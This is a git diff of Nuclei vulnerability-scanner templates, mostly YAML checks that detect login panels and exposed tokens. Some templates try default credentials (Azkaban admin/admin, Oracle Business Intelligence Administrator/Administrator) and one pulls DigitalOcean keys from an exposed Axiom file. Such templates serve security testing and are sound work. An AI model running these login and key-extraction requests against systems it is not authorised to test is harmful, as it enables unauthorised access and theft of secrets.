+ - method: GET + path: + - '{{BaseURL}}/_dashboards/app/login' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Please login to OpenSearch Dashboards" \ No newline at end of file diff --git a/poc/auth/aws-opensearch-login-650.yaml b/poc/auth/aws-opensearch-login-650.yaml deleted file mode 100644 index 14f111d73a..0000000000 --- a/poc/auth/aws-opensearch-login-650.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: aws-opensearch-login - -info: - name: AWS OpenSearch Default Login - author: Higor Melgaço (eremit4) - severity: medium - description: Searches for the AWS OpenSearch login page - reference: - - https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ - tags: panel,opensearch,aws - -requests: - - method: GET - path: - - '{{BaseURL}}/_dashboards/app/login' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "Please login to OpenSearch Dashboards" \ No newline at end of file diff --git a/poc/auth/axiom-digitalocean-key-exposure-666.yaml b/poc/auth/axiom-digitalocean-key-exposure-666.yaml deleted file mode 100644 index 589c0b408e..0000000000 --- a/poc/auth/axiom-digitalocean-key-exposure-666.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: axiom-digitalocean-key-exposure - -info: - name: DigitalOcean Key Exposure via Axiom - author: geeknik - severity: critical - description: Axiom is a dynamic infrastructure framework to efficiently work with multi-cloud environments. - reference: - - https://github.com/pry0cc/axiom - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cwe-id: CWE-425 - remediation: Restrict access to the do.json file or upgrade to a newer version of Axiom - tags: axiom,digitalocean,key,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/.axiom/accounts/do.json" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '"do_key"' - - '"region"' - - '"provider"' - condition: and - - extractors: - - type: regex - part: body - regex: - - '\"do_key\"\: .*' - -# Enhanced by cs on 2022/02/28 diff --git a/poc/auth/axiom-digitalocean-key-exposure.yaml b/poc/auth/axiom-digitalocean-key-exposure-668.yaml similarity index 100% rename from poc/auth/axiom-digitalocean-key-exposure.yaml rename to poc/auth/axiom-digitalocean-key-exposure-668.yaml diff --git a/poc/auth/azkaban-default-login-674.yaml b/poc/auth/azkaban-default-login-674.yaml new file mode 100644 index 0000000000..5d9e13ca58 --- /dev/null +++ b/poc/auth/azkaban-default-login-674.yaml @@ -0,0 +1,47 @@ +id: azkaban-default-login + +info: + name: Azkaban Web Client Default Credential + author: pussycat0x + severity: high + reference: https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22 + tags: default-login,azkaban + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + action=login&username={{username}}&password={{password}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork + matchers-condition: and + matchers: + - type: word + words: + - '"session.id"' + - '"success"' + condition: and + + - type: word + words: + - 'azkaban.browser.session.id' + - 'application/json' + condition: and + part: header + + - type: status + status: + - 200 + + extractors: + - type: kval + kval: + - azkaban.browser.session.id diff --git a/poc/auth/azkaban-default-login.yaml b/poc/auth/azkaban-default-login.yaml deleted file mode 100644 index be127dd034..0000000000 --- a/poc/auth/azkaban-default-login.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: azkaban-default-login - -info: - name: Azkaban Web Client Default Credential - author: pussycat0x - severity: high - description: Azkaban is a batch workflow job scheduler created at LinkedIn to run Hadoop jobs. Default web client credentials were discovered. - classification: - cwe-id: CWE-798 - metadata: - shodan-query: http.title:"Azkaban Web Client" - tags: default-login,azkaban - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - action=login&username={{username}}&password={{password}} - - payloads: - username: - - admin - password: - - admin - attack: pitchfork - matchers-condition: and - matchers: - - type: word - words: - - '"session.id"' - - '"success"' - condition: and - - - type: word - words: - - 'azkaban.browser.session.id' - - 'application/json' - condition: and - part: header - - - type: status - status: - - 200 - - extractors: - - type: kval - kval: - - azkaban.browser.session.id - -# Enhanced by mp on 2022/03/03 diff --git a/poc/auth/basic-auth-detection-688.yaml b/poc/auth/basic-auth-detection-688.yaml index b1d95275fc..6ec77642b9 100644 --- a/poc/auth/basic-auth-detection-688.yaml +++ b/poc/auth/basic-auth-detection-688.yaml @@ -1,22 +1,23 @@ -id: basic-auth-detection - -info: - name: Basic auth detection - author: esetal - severity: info - tags: tech,basic-auth - description: improved version of nuclei-templates/technologies/basic-auth-detection.yaml - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: status - status: - - 401 - - type: dsl - dsl: - - contains(tolower(all_headers), 'www-authenticate') +id: basic-auth-detection + +info: + name: Basic auth detection + author: w4cky_ + severity: info + tags: tech,basic-auth + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: status + status: + - 401 + + - type: word + words: + - "Www-Authenticate:" + part: header diff --git a/poc/auth/bazarr-login-700.yaml b/poc/auth/bazarr-login-703.yaml similarity index 100% rename from poc/auth/bazarr-login-700.yaml rename to poc/auth/bazarr-login-703.yaml diff --git a/poc/auth/beyondtrust-login-server-719.yaml b/poc/auth/beyondtrust-login-server-719.yaml new file mode 100644 index 0000000000..b2bb002482 --- /dev/null +++ b/poc/auth/beyondtrust-login-server-719.yaml @@ -0,0 +1,31 @@ +id: beyondtrust-login-server + +info: + name: BeyondTrust PAM login Server + author: r3dg33k,nuk3s3c + severity: info + tags: beyondtrust,pam,panel + +requests: + - method: GET + path: + - '{{BaseURL}}/WebConsole/api/security/auth/loginServers' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + regex: + - '"DomainName":"(.*)"' + - '"domains":' + condition: and + + extractors: + - type: json + part: body + json: + - ".domains[] | .DomainName" + - ".domains[] | .ldapservers" \ No newline at end of file diff --git a/poc/auth/bigbluebutton-login-725.yaml b/poc/auth/bigbluebutton-login-725.yaml new file mode 100644 index 0000000000..5c06b01d1d --- /dev/null +++ b/poc/auth/bigbluebutton-login-725.yaml @@ -0,0 +1,34 @@ +id: bigbluebutton-login + +info: + name: BigBlueButton Login Panel + author: myztique + severity: info + description: A BigBlueButton login panel was detected. + reference: + - https://github.com/bigbluebutton/greenlight + classification: + cwe-id: CWE-200 + tags: panel,bigbluebutton + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'content="BigBlueButton' + + extractors: + - type: regex + part: body + name: version + group: 1 + regex: + - 'Greenlight<\/a>\. (.*)' + +# Enhanced by mp on 2022/03/23 diff --git a/poc/auth/bigbluebutton-login-726.yaml b/poc/auth/bigbluebutton-login-726.yaml deleted file mode 100644 index d9922131ed..0000000000 --- a/poc/auth/bigbluebutton-login-726.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: bigbluebutton-login - -info: - name: BigBlueButton Login Panel - author: myztique - severity: info - reference: https://github.com/bigbluebutton/greenlight - tags: panel,bigbluebutton - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'content="BigBlueButton' - - extractors: - - type: regex - part: body - name: version - group: 1 - regex: - - 'Greenlight<\/a>\. (.*)' diff --git a/poc/auth/bigbluebutton-login.yaml b/poc/auth/bigbluebutton-login.yaml index 5c06b01d1d..f39653d539 100644 --- a/poc/auth/bigbluebutton-login.yaml +++ b/poc/auth/bigbluebutton-login.yaml @@ -9,9 +9,11 @@ info: - https://github.com/bigbluebutton/greenlight classification: cwe-id: CWE-200 + metadata: + max-request: 1 tags: panel,bigbluebutton -requests: +http: - method: GET path: - '{{BaseURL}}' @@ -31,4 +33,4 @@ requests: regex: - 'Greenlight<\/a>\. (.*)' -# Enhanced by mp on 2022/03/23 +# digest: 4a0a0047304502210099961d3076d0221b509af7cb12b6bc28e154ee0fe64c70453333725a8d9dd40402205db99afee860ce6e3fda9ec6008e4b66269491e2499266357880e30a895d52a8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/blue-iris-login-753.yaml b/poc/auth/blue-iris-login-753.yaml index 783f3c0527..4a1e4acd08 100644 --- a/poc/auth/blue-iris-login-753.yaml +++ b/poc/auth/blue-iris-login-753.yaml @@ -2,17 +2,17 @@ id: blue-iris-login info: name: Blue Iris Login - author: dhiyaneshDK,idealphase + author: dhiyaneshDK severity: info description: A Blue Iris login panel was detected. reference: - https://www.exploit-db.com/ghdb/6814 - https://blueirissoftware.com/ classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 cwe-id: CWE-200 - metadata: - shodan-query: http.title:"Blue Iris Login" - tags: panel,blueiris + tags: panel,blue-iris requests: - method: GET @@ -24,13 +24,8 @@ requests: - type: word words: - '<title>Blue Iris Login' - - type: status status: - 200 - extractors: - - type: regex - group: 1 - regex: - - 'var bi_version = "(.*)";' +# Enhanced by mp on 2022/03/23 diff --git a/poc/auth/blue-iris-login-754.yaml b/poc/auth/blue-iris-login-754.yaml index 4a1e4acd08..224b1d1b46 100644 --- a/poc/auth/blue-iris-login-754.yaml +++ b/poc/auth/blue-iris-login-754.yaml @@ -4,15 +4,8 @@ info: name: Blue Iris Login author: dhiyaneshDK severity: info - description: A Blue Iris login panel was detected. - reference: - - https://www.exploit-db.com/ghdb/6814 - - https://blueirissoftware.com/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 - tags: panel,blue-iris + reference: https://www.exploit-db.com/ghdb/6814 + tags: panel requests: - method: GET @@ -27,5 +20,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/23 diff --git a/poc/auth/braintree-access-token.yaml b/poc/auth/braintree-access-token.yaml deleted file mode 100644 index fc4e695c66..0000000000 --- a/poc/auth/braintree-access-token.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: braintree-access-token - -info: - name: PayPal Braintree Access Token Disclosure - author: Ice3man - severity: info - tags: exposure,token - -requests: - - method: GET - path: - - "{{BaseURL}}" - extractors: - - type: regex - part: body - regex: - - 'access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}' \ No newline at end of file diff --git a/poc/auth/branch-key-774.yaml b/poc/auth/branch-key-774.yaml deleted file mode 100644 index 1b63de346f..0000000000 --- a/poc/auth/branch-key-774.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: branch-key - -info: - name: Branch.io Live Key - author: 0xh7ml - severity: info - reference: https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74 - tags: token,file - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "key_live_.{32}" diff --git a/poc/auth/branch-key-775.yaml b/poc/auth/branch-key-775.yaml new file mode 100644 index 0000000000..877dd31a45 --- /dev/null +++ b/poc/auth/branch-key-775.yaml @@ -0,0 +1,18 @@ +id: branch-key + +info: + name: Branch.io Live Key + author: 0xh7ml + severity: info + reference: + - https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74 + tags: token,file + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "key_live_.{32}" diff --git a/poc/auth/branch-key.yaml b/poc/auth/branch-key.yaml index 14efab44d2..1b63de346f 100644 --- a/poc/auth/branch-key.yaml +++ b/poc/auth/branch-key.yaml @@ -1,17 +1,12 @@ id: branch-key info: - name: Branch.io Live Key - Detect + name: Branch.io Live Key author: 0xh7ml severity: info - description: Branch.io live key token was detected. - reference: - - https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 + reference: https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74 tags: token,file + file: - extensions: - all @@ -20,6 +15,3 @@ file: - type: regex regex: - "key_live_.{32}" - -# Enhanced by md on 2023/05/04 -# digest: 4a0a00473045022100f744edb25f959b276258779576a4f1fb240844fb339af77b5dbb8701453f3257022000c9a3d5ea7358604a0ef75214afb271b0a9932f53f7822a4285e8fcd67a609c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/brother-unauthorized-access-792.yaml b/poc/auth/brother-unauthorized-access-792.yaml deleted file mode 100644 index 3e9b12151b..0000000000 --- a/poc/auth/brother-unauthorized-access-792.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: brother-unauthorized-access - -info: - name: Brother Printer - author: pussycat0x - severity: medium - reference: https://www.exploit-db.com/ghdb/6889 - tags: iot,printer,unauth - -requests: - - method: GET - path: - - "{{BaseURL}}/net/net/net.html" - - matchers-condition: and - matchers: - - type: word - words: - - "Brother Industries" - - "Network Status" - condition: and - - - type: status - status: - - 200 diff --git a/poc/auth/brother-unauthorized-access.yaml b/poc/auth/brother-unauthorized-access.yaml index c57d504fb3..f3e5d8283c 100644 --- a/poc/auth/brother-unauthorized-access.yaml +++ b/poc/auth/brother-unauthorized-access.yaml @@ -1,29 +1,25 @@ -id: brother-unauthorized-access +id: brother-unauthorized-access -info: - name: Brother Printer - author: pussycat0x - severity: medium - reference: https://www.exploit-db.com/ghdb/6889 - metadata: - max-request: 1 - tags: iot,printer,unauth +info: + name: Brother Printer + author: pussycat0x + severity: medium + reference: https://www.exploit-db.com/ghdb/6889 + tags: iot,printer,unauth -http: - - method: GET - path: - - "{{BaseURL}}/net/net/net.html" - - matchers-condition: and - matchers: - - type: word - words: - - "Brother Industries" - - "Network Status" - condition: and - - - type: status - status: - - 200 - -# digest: 4a0a00473045022100bc48aa1c015d7454147e9553d8c430f7a53e2888d1184923895f4f8c24f695e302201cf12a115bccdd3e47356f9ffe206676937b6d2d14841de4ba2ad78bd7a4da7f:922c64590222798bb761d5b6d8e72950 +requests: + - method: GET + path: + - "{{BaseURL}}/net/net/net.html" + + matchers-condition: and + matchers: + - type: word + words: + - "Brother Industries" + - "Network Status" + condition: and + + - type: status + status: + - 200 diff --git a/poc/auth/businessintelligence-default-login-817.yaml b/poc/auth/businessintelligence-default-login-814.yaml similarity index 100% rename from poc/auth/businessintelligence-default-login-817.yaml rename to poc/auth/businessintelligence-default-login-814.yaml diff --git a/poc/auth/businessintelligence-default-login.yaml b/poc/auth/businessintelligence-default-login.yaml deleted file mode 100644 index 7aa3769e5b..0000000000 --- a/poc/auth/businessintelligence-default-login.yaml +++ /dev/null @@ -1,55 +0,0 @@ -id: oracle-business-intelligence-login - -info: - name: Oracle Business Intelligence Default Login - author: milo2012 - description: Oracle Business Intelligence default admin credentials were discovered. - severity: high - tags: oracle,default-login - reference: - - https://docs.oracle.com/cd/E12096_01/books/AnyDeploy/AnyDeployMisc2.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 - -requests: - - raw: - - | - POST /xmlpserver/services/XMLPService HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml - SOAPAction: "" - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - - - - - - {{username}} - {{password}} - bi - - - - - payloads: - username: - - Administrator - password: - - Administrator - attack: pitchfork - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'createSessionReturn' - part: body - -# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/camunda-login-panel.yaml b/poc/auth/camunda-login-panel.yaml index b4a6543207..195e594fc0 100644 --- a/poc/auth/camunda-login-panel.yaml +++ b/poc/auth/camunda-login-panel.yaml @@ -1,13 +1,21 @@ id: camunda-login-panel + info: - name: Camunda Login panel + name: Camunda Login Panel - Detect author: alifathi-h1 severity: info - description: Default Credentials of demo:demo on Camunda application. - reference: https://docs.camunda.org/manual/7.15/webapps/admin/user-management/ + description: Camunda login panel was detected. + reference: + - https://docs.camunda.org/manual/7.15/webapps/admin/user-management/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 2 tags: camunda,panel,login -requests: +http: - method: GET path: - '{{BaseURL}}/app/welcome/default/#!/login' @@ -15,10 +23,10 @@ requests: matchers-condition: and matchers: - - type: word words: - "Camunda Welcome" + - type: status status: - 200 @@ -29,3 +37,5 @@ requests: group: 1 regex: - '